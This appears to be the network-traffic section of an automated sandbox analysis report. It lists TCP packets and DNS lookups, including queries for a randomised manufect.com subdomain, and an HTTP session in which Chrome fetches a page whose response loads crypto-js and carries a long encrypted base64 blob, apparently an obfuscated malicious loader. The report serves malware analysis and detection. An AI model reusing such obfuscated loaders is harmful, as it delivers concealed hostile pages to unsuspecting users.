                  Oct 23, 2024 06:48:25.832345963 CEST4434988513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.838656902 CEST49885443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.838743925 CEST4434988513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.838892937 CEST49885443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.838908911 CEST4434988513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.908024073 CEST4434988413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.908094883 CEST4434988413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.908195019 CEST4434988413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.908334970 CEST49884443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.908577919 CEST49884443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.908577919 CEST49884443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.908591986 CEST4434988413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.908601999 CEST4434988413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.913474083 CEST49889443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.913513899 CEST4434988913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.913796902 CEST49889443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.913955927 CEST49889443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.913973093 CEST4434988913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.965795040 CEST4434988513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.965883970 CEST4434988513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.966028929 CEST49885443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.966029882 CEST49885443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.966029882 CEST49885443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.967940092 CEST49890443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.967959881 CEST4434989013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:25.968008041 CEST49890443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.968234062 CEST49890443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:25.968245029 CEST4434989013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.267810106 CEST49885443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.267874002 CEST4434988513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.521097898 CEST4434988713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.521656036 CEST49887443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.521718025 CEST4434988713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.521905899 CEST49887443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.521919966 CEST4434988713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.537714958 CEST4434988813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.538014889 CEST49888443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.538050890 CEST4434988813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.538163900 CEST4434988613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.538383961 CEST49888443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.538392067 CEST4434988813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.538404942 CEST49886443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.538430929 CEST4434988613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.538996935 CEST49886443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.539002895 CEST4434988613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.638705969 CEST4434988913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.639199018 CEST49889443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.639214993 CEST4434988913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.639576912 CEST49889443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.639580965 CEST4434988913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.648941040 CEST4434988713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.649071932 CEST4434988713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.649261951 CEST49887443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.649261951 CEST49887443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.649261951 CEST49887443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.651659966 CEST49891443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.651683092 CEST4434989113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.651734114 CEST49891443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.651874065 CEST49891443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.651884079 CEST4434989113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.667203903 CEST4434988813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.667270899 CEST4434988813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.667330027 CEST49888443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.667340040 CEST4434988813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.667396069 CEST4434988813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.667440891 CEST49888443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.667471886 CEST49888443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.667488098 CEST4434988813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.667500019 CEST49888443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.667505980 CEST4434988813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.668204069 CEST4434988613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.668381929 CEST4434988613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.668468952 CEST49886443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.668468952 CEST49886443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.668468952 CEST49886443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.669902086 CEST49892443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.669990063 CEST4434989213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.670172930 CEST49893443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.670232058 CEST4434989313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.670279026 CEST49892443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.670279026 CEST49892443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.670290947 CEST49893443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.670368910 CEST4434989213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.670413971 CEST49893443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.670429945 CEST4434989313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.715471029 CEST4434989013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.715776920 CEST49890443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.715787888 CEST4434989013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.716094017 CEST49890443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.716101885 CEST4434989013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.767487049 CEST4434988913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.767633915 CEST4434988913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.767924070 CEST49889443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.767971992 CEST49889443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.767980099 CEST4434988913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.767988920 CEST49889443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.767992973 CEST4434988913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.770032883 CEST49894443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.770121098 CEST4434989413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.770200014 CEST49894443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.770473003 CEST49894443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.770515919 CEST4434989413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.848576069 CEST4434989013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.848607063 CEST4434989013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.848645926 CEST49890443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.848664045 CEST4434989013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.848689079 CEST4434989013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.848723888 CEST49890443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.848830938 CEST49890443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.848844051 CEST4434989013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.848855019 CEST49890443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.848860025 CEST4434989013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.850900888 CEST49895443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.850929976 CEST4434989513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.850984097 CEST49895443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.851100922 CEST49895443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.851110935 CEST4434989513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.955311060 CEST49887443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.955372095 CEST4434988713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:26.970824003 CEST49886443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:26.970848083 CEST4434988613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.388741016 CEST4434989113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.389199018 CEST49891443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.389219999 CEST4434989113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.389647961 CEST49891443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.389652967 CEST4434989113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.406599045 CEST4434989213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.407022953 CEST49892443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.407047033 CEST4434989213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.407361984 CEST49892443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.407367945 CEST4434989213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.419130087 CEST4434989313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.419430017 CEST49893443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.419445038 CEST4434989313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.419919968 CEST49893443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.419928074 CEST4434989313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.503583908 CEST4434989413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.503922939 CEST49894443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.503940105 CEST4434989413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.504313946 CEST49894443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.504317999 CEST4434989413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.518856049 CEST4434989113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.518996954 CEST4434989113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.519057989 CEST49891443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.519226074 CEST49891443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.519226074 CEST49891443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.519239902 CEST4434989113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.519248009 CEST4434989113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.521878958 CEST49896443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.521912098 CEST4434989613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.522013903 CEST49896443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.522166967 CEST49896443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.522183895 CEST4434989613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.536065102 CEST4434989213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.536204100 CEST4434989213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.536263943 CEST49892443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.536427021 CEST49892443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.536439896 CEST4434989213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.536452055 CEST49892443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.536457062 CEST4434989213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.539056063 CEST49897443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.539088011 CEST4434989713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.540682077 CEST49897443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.540879011 CEST49897443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.540911913 CEST4434989713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.552659988 CEST4434989313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.552794933 CEST4434989313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.553491116 CEST49893443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.553550959 CEST49893443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.553550959 CEST49893443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.553581953 CEST4434989313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.553607941 CEST4434989313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.555016041 CEST49898443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.555031061 CEST4434989813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.555123091 CEST49898443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.555181980 CEST49898443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.555202007 CEST4434989813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.599442005 CEST4434989513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.599747896 CEST49895443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.599766970 CEST4434989513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.600119114 CEST49895443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.600123882 CEST4434989513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.633133888 CEST4434989413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.633203983 CEST4434989413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.633305073 CEST4434989413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.633318901 CEST49894443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.633362055 CEST49894443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.633393049 CEST49894443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.633407116 CEST4434989413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.633415937 CEST49894443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.633421898 CEST4434989413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.635334969 CEST49899443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.635418892 CEST4434989913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:27.635495901 CEST49899443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.635673046 CEST49899443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:27.635705948 CEST4434989913.107.246.60192.168.2.4
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 23, 2024 06:47:03.588922024 CEST53570051.1.1.1192.168.2.4
                  Oct 23, 2024 06:47:03.614145041 CEST53645521.1.1.1192.168.2.4
                  Oct 23, 2024 06:47:04.924922943 CEST53625481.1.1.1192.168.2.4
                  Oct 23, 2024 06:47:05.430341005 CEST5077353192.168.2.41.1.1.1
                  Oct 23, 2024 06:47:05.430526018 CEST5876353192.168.2.41.1.1.1
                  Oct 23, 2024 06:47:05.445318937 CEST53587631.1.1.1192.168.2.4
                  Oct 23, 2024 06:47:05.445919037 CEST53507731.1.1.1192.168.2.4
                  Oct 23, 2024 06:47:07.784280062 CEST5515453192.168.2.41.1.1.1
                  Oct 23, 2024 06:47:07.784456015 CEST5970153192.168.2.41.1.1.1
                  Oct 23, 2024 06:47:07.791512012 CEST53551541.1.1.1192.168.2.4
                  Oct 23, 2024 06:47:07.791862011 CEST53597011.1.1.1192.168.2.4
                  Oct 23, 2024 06:47:08.063494921 CEST6379053192.168.2.41.1.1.1
                  Oct 23, 2024 06:47:08.063591957 CEST5308753192.168.2.41.1.1.1
                  Oct 23, 2024 06:47:08.070914984 CEST53637901.1.1.1192.168.2.4
                  Oct 23, 2024 06:47:08.070954084 CEST53530871.1.1.1192.168.2.4
                  Oct 23, 2024 06:47:21.084764957 CEST138138192.168.2.4192.168.2.255
                  Oct 23, 2024 06:47:21.905899048 CEST53587821.1.1.1192.168.2.4
                  Oct 23, 2024 06:47:41.046367884 CEST53504981.1.1.1192.168.2.4
                  Oct 23, 2024 06:48:03.455620050 CEST53578811.1.1.1192.168.2.4
                  Oct 23, 2024 06:48:03.931951046 CEST53503341.1.1.1192.168.2.4
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 23, 2024 06:47:05.430341005 CEST192.168.2.41.1.1.10x174Standard query (0)t3sp2vzrhieujyp67175b9328f1f.manufect.comA (IP address)IN (0x0001)false
                  Oct 23, 2024 06:47:05.430526018 CEST192.168.2.41.1.1.10xe3dcStandard query (0)t3sp2vzrhieujyp67175b9328f1f.manufect.com65IN (0x0001)false
                  Oct 23, 2024 06:47:07.784280062 CEST192.168.2.41.1.1.10xac39Standard query (0)www.google.comA (IP address)IN (0x0001)false
                  Oct 23, 2024 06:47:07.784456015 CEST192.168.2.41.1.1.10xed88Standard query (0)www.google.com65IN (0x0001)false
                  Oct 23, 2024 06:47:08.063494921 CEST192.168.2.41.1.1.10xb859Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                  Oct 23, 2024 06:47:08.063591957 CEST192.168.2.41.1.1.10xca4bStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 23, 2024 06:47:05.445318937 CEST1.1.1.1192.168.2.40xe3dcNo error (0)t3sp2vzrhieujyp67175b9328f1f.manufect.com65IN (0x0001)false
                  Oct 23, 2024 06:47:05.445919037 CEST1.1.1.1192.168.2.40x174No error (0)t3sp2vzrhieujyp67175b9328f1f.manufect.com104.21.3.186A (IP address)IN (0x0001)false
                  Oct 23, 2024 06:47:05.445919037 CEST1.1.1.1192.168.2.40x174No error (0)t3sp2vzrhieujyp67175b9328f1f.manufect.com172.67.131.24A (IP address)IN (0x0001)false
                  Oct 23, 2024 06:47:07.791512012 CEST1.1.1.1192.168.2.40xac39No error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                  Oct 23, 2024 06:47:07.791862011 CEST1.1.1.1192.168.2.40xed88No error (0)www.google.com65IN (0x0001)false
                  Oct 23, 2024 06:47:08.070914984 CEST1.1.1.1192.168.2.40xb859No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                  Oct 23, 2024 06:47:58.643969059 CEST1.1.1.1192.168.2.40xe497No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                  Oct 23, 2024 06:47:58.643969059 CEST1.1.1.1192.168.2.40xe497No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                  Oct 23, 2024 06:48:16.791506052 CEST1.1.1.1192.168.2.40x8bd5No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                  Oct 23, 2024 06:48:16.791506052 CEST1.1.1.1192.168.2.40x8bd5No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                  Oct 23, 2024 06:48:16.791506052 CEST1.1.1.1192.168.2.40x8bd5No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                  • t3sp2vzrhieujyp67175b9328f1f.manufect.com
                  • https:
                  • a.nel.cloudflare.com
                  • fs.microsoft.com
                  • slscr.update.microsoft.com
                  • otelrules.azureedge.net
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449739104.21.3.1864431136C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:47:07 UTC747OUTGET /d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpack HTTP/1.1
                  Host: t3sp2vzrhieujyp67175b9328f1f.manufect.com
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
                  sec-ch-ua-platform: "Windows"
                  Upgrade-Insecure-Requests: 1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Sec-Fetch-Site: none
                  Sec-Fetch-Mode: navigate
                  Sec-Fetch-User: ?1
                  Sec-Fetch-Dest: document
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-10-23 04:47:07 UTC895INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:47:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  access-control-allow-origin: *
                  vary: Accept-Encoding
                  x-turbo-charged-by: LiteSpeed
                  cf-cache-status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2BNulneKMYkEAK%2F3TSQiRgx4PUYSAMP767LDlXaKhnODV5sFgmsi15gSqafzrXawXx3yYlH%2BtsQ8S4FtpS%2Fess94sUoC4L6sA7J26uHFoCNZeexiPam9X13CEDPLspVLPb%2BuPX3YqoIC0tn3RIZ%2F0rIu4mhCeqQ%2BVG8HEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8d6f1656fdb94677-DFW
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=1740&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1325&delivery_rate=1674956&cwnd=247&unsent_bytes=0&cid=d4e97a3ef2ce6325&ts=952&x=0"
                  2024-10-23 04:47:07 UTC474INData Raw: 62 38 64 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 4b 6e 49 49 4d 53 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 73 4b 6e 49 49 4d 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 73 4b 6e 49 49 4d 53 29 3b 0d 0a 20 20 20 20 20 20 20 20 73 4b 6e 49 49 4d 53 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20
                  Data Ascii: b8d var sKnIIMS = document.createElement("script"); sKnIIMS.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"); document.head.append(sKnIIMS); sKnIIMS.onload = function() {
                  2024-10-23 04:47:07 UTC1369INData Raw: 44 6b 33 4e 57 51 78 4e 32 45 77 59 6d 45 77 4e 32 56 6d 4d 6d 5a 68 4f 44 41 30 5a 57 59 32 59 7a 45 31 4e 32 45 33 4d 57 46 6c 4e 7a 67 32 59 6a 45 31 59 6d 55 31 59 6a 63 30 5a 44 64 6b 4f 44 55 34 4d 57 4e 6a 59 6d 51 77 4e 47 56 6b 4d 54 49 77 4f 44 51 30 4f 57 4d 77 4d 6a 63 7a 59 54 4a 6a 4d 7a 6c 6c 4d 47 4a 6a 4e 7a 63 30 4e 44 5a 6c 5a 47 4d 30 4d 44 55 32 5a 57 5a 6b 5a 44 67 7a 4d 7a 68 6b 4d 6a 49 77 4e 7a 45 78 4e 6a 46 6c 4e 54 41 33 59 6d 59 32 59 57 56 6a 59 6a 52 6b 4e 57 59 32 5a 6a 49 35 4e 44 46 68 4e 7a 5a 6d 5a 47 4d 30 5a 44 52 6b 4d 57 51 79 4d 44 64 6d 4e 6d 4e 6d 5a 6d 59 32 4d 7a 6b 78 5a 6d 4d 30 4e 6d 55 33 4e 6a 55 32 4e 57 45 30 5a 44 5a 6d 5a 6a 49 78 5a 47 59 79 4e 7a 51 33 4d 54 41 78 4f 47 52 6d 4e 6d 59 7a 5a 44 59 32
                  Data Ascii: Dk3NWQxN2EwYmEwN2VmMmZhODA0ZWY2YzE1N2E3MWFlNzg2YjE1YmU1Yjc0ZDdkODU4MWNjYmQwNGVkMTIwODQ0OWMwMjczYTJjMzllMGJjNzc0NDZlZGM0MDU2ZWZkZDgzMzhkMjIwNzExNjFlNTA3YmY2YWVjYjRkNWY2ZjI5NDFhNzZmZGM0ZDRkMWQyMDdmNmNmZmY2MzkxZmM0NmU3NjU2NWE0ZDZmZjIxZGYyNzQ3MTAxOGRmNmYzZDY2
                  2024-10-23 04:47:07 UTC1121INData Raw: 5a 6b 5a 57 51 35 4d 6a 55 7a 5a 57 55 7a 4d 54 67 78 4e 6d 52 6b 59 6d 4d 35 59 6a 4e 69 4e 54 5a 68 4f 54 4d 34 4d 7a 64 6a 4e 54 64 69 4e 47 59 77 4d 54 59 79 59 54 55 78 4d 47 5a 6a 4d 6d 55 34 59 32 55 7a 5a 54 41 77 5a 44 4e 6a 4e 6d 4d 77 4d 7a 42 6a 4e 6a 4d 32 59 57 4d 78 59 7a 67 79 4d 44 63 78 59 54 4a 6a 59 6a 51 34 5a 54 45 78 59 57 51 30 4e 6d 46 6c 5a 54 4d 30 5a 47 59 79 5a 6a 4d 7a 4e 47 4e 6d 4d 54 4d 78 59 6d 55 77 4e 6d 56 68 59 32 5a 6d 4e 7a 6b 79 59 54 67 30 4e 44 55 31 4d 32 4e 6b 59 54 52 69 5a 6a 45 34 5a 44 41 33 4e 6a 64 68 4d 6a 6b 7a 5a 54 4a 6d 5a 57 56 6d 4d 47 59 79 4e 6a 63 35 4e 57 51 77 4e 6a 42 68 4e 7a 46 6c 4f 44 64 6a 4e 6d 56 6a 4e 47 45 78 4f 47 49 78 59 54 4d 35 4d 6a 4d 77 4e 54 59 78 59 54 59 7a 4e 32 4d 30 59
                  Data Ascii: ZkZWQ5MjUzZWUzMTgxNmRkYmM5YjNiNTZhOTM4MzdjNTdiNGYwMTYyYTUxMGZjMmU4Y2UzZTAwZDNjNmMwMzBjNjM2YWMxYzgyMDcxYTJjYjQ4ZTExYWQ0NmFlZTM0ZGYyZjMzNGNmMTMxYmUwNmVhY2ZmNzkyYTg0NDU1M2NkYTRiZjE4ZDA3NjdhMjkzZTJmZWVmMGYyNjc5NWQwNjBhNzFlODdjNmVjNGExOGIxYTM5MjMwNTYxYTYzN2M0Y
                  2024-10-23 04:47:07 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.449740104.21.3.1864431136C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:47:07 UTC701OUTGET /favicon.ico HTTP/1.1
                  Host: t3sp2vzrhieujyp67175b9328f1f.manufect.com
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
